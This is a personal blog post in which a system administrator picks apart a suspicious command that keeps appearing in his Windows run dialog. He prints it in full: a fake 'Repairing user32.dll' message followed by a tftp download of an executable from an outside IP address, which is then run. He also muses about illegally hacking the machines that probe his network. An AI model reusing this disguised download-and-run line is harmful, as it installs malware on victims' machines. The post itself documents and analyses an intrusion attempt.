ACK. I just lost everything I wrote 🙁
ok. Start again. starting now……………….
Today I went on one of my computers and noticed an interesting error message: "unsupported parameter -i" (or something like this) This was not really a new message. I have seen it, and ignored it many times. The message comes from something that randomly shows up in my run dialog box:
"%comspec% /c echo Repairing user32.dll & echo Please wait… & tftp -i 75.8.46.128 GET ywxp.exe & start ywxp&"
I have not really taken a look at it before, so lets do that now.
%comspec% is an environment variable pointing to your cmd.exe file. (32 bit dos prompt)
/c tells cmd.exe to execute the command(s) on the command line then exit
the Commands on the command line are "echo Repairing user32.dll & echo Please wait… & tftp -i 75.8.46.128 GET ywxp.exe & start ywxp&"
The & sign separates different commands on the command line
echo Repairing user32.dll & echo Please wait… simply prints the following on the screen
Repairing user32.dll
Please wait…
tftp is a program provided with all NT/2000/xp (i am assuming) computers that downloads files from a remote server.
-i tells tftp to use binary mode (no converting end of line characters)
75.8.46.128 is the ip address we are connecting to. adsl-75-8-46-128.dsl.applwi.sbcglobal.net. The serve is located in Freedom Wisconsin near Appleton. They are connected using SBCGlobal and are on dsl. so, nothing really fancy.
Note: The following address also show up in my history:
70.54.3.11 – bas4-kingston08-1177944843.dsl.bell.ca (Napanee, bell canada, ontario)
68.213.254.139 – adsl-068-213-254-139.sip.mia.bellsouth.net (Miami, florida, Bellsouth)
GET indicates that we are downloading something
ywxp.exe is the file we are retrieving
Start ywxp.exe runs the file we just downloaded
I have also gotten neml.exe and vtst.exe
I have no idea what these programs do, and since I cannot connect to any of these addresses I may never know. 🙁 I want to download them and see what happens.
However I am not completely sure how this gets onto my computer in the first place. Somehow something opens the run dialog types that in and tries to run it. but I am at a loss how.
I am currently in the process of doing scans on my system I have done Ad-aware and spy-bot. (WHO CARES ABOUT COOKIES?) and currently doing an active scan by panda software. if nothing shows up, trend micro, and possibly AVG.
The system in question is a windows NT 4.0 6a, so. honestly who cares if they get in. nothing for them to do if they are expecting XP.
Out of curiosity I checked my application logs on the computer to see what has been going on. one interesting thing keeps popping up.
Someone from Moose Jaw is making multiple attempts to connect to my computer.
204.83.254.106 – 204-83-254-106.msjw.hsdb.sasknet.sk.ca (moose jaw, saskatchewan, sasktel)
A bit earlier this month someone from korea, using the same program.
222.102.226.23 – Sunchon, Cholla-namdo, Korea, Korea telecom.
And a bit earlier someone in india, again with the same program
59.145.150.155 – dsl-KK-static-155.150.145.59.airtelbroadband.in Bangalore, Karnataka, India, Bharti Broadband – (Scandent Solutions Corporation Limited)
Now. Either a lot of people are trying to get into my system (strange and unlikely) or there are a lot of trojans or the like out there.
Probably should be noted that a lot of people in china seem to be interested in getting into my router.
Yeah. almost makes me want to do something illegal. like take over their computers. or whatnot.
Still bothers me how someone managed to get far enough to try downloading stuff though.
if I feel energetic and can avoid being detected by people who disapprove of such things. I may attempt to find out more about these computers. I have however seen trojans who do similar things like this. At one hotel we have, a worm had installed itself and was spreading through a vulnerability in one of the version of VNC that w used. we have since upgraded. The real purpose of the worm was unknown, but probably was meant to give someone access to a lot of computers.
Ah whatever, will see what I can keep track of, monitoring audits and whatnot.
At least it gave me something to write about.